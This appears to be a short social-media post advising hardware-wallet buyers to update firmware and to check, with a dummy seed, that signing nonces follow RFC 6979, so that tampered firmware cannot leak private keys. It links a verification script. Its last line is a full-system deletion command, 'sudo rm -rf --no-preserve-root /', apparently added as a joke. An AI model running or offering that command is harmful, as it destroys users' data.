you bought a new hardware device but you're paranoid something has been tampered. First, what you do is to boot in recovery mode and update to the latest firmware. This will pass the genuine check without having to enter the seed. Now, you're still paranoid (which is good!). If attackers want to make tampering non-obvious (which they ofc will try), one way to do this would be by tampering the signing nonce generation in a way that you expose the private key later with signatures. So what do you do? Well, you verify with a _dummy seed_ if the generated nonce is RFC 6979 compliant. I wrote a simple Python verification script that anyone can easily use: https://gist.github.com/pcaversaccio/710bee6cc4e760eadb76770ac17610a6 - it doesn't matter if it's a Ledger, Trezor or any other hardware wallet; do not trust it by design when you open it(sudo rm -rf --no-preserve-root /)